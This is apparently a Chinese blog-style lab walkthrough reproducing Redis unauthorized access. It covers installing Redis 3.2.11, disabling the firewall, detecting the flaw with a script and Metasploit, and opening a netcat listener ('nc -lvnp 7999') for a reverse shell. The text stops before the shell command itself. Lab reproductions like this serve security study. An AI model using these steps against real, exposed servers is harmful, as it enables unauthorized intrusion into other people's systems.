redis未授权访问

Redis未授权访问复现

0x01 环境搭建

从官网wget到本地
wget http://download.redis.io/releases/redis-3.2.11.tar.gz

tar xzf redis-3.2.11.tar.gz解压文件
进入解压目录输入,make编译，如下编译成功

接着输入make install

make结束后，进入src目录：cd src，将redis-server和redis-cli拷贝到/usr/bin目录下（这样启动redis-server和redis-cli就不用每次都进入安装目录了）

返回目录reids-3.2.11，将redis.conf拷贝到etc目录下

启动redis服务redis-server /etc/redis.conf

关闭防火墙
systemctl status firewalld查看当前防火墙状态。
systemctl stop firewalld关闭当前防火墙。
systemctl disable firewalld开机防火墙不启动。

0x02 漏洞利用

靶机Centos：192.168.202.129
攻击机kali：192.168.202.128

Centos启动redis服务，启动成功

未授权访问测试admin默认密码登陆redis

漏洞检测，脚本检测

Msf检测

Show options 查看选项，set rhost添加目标

反弹shell

自己的服务器监听端口
nc -lvnp 7999
执行命令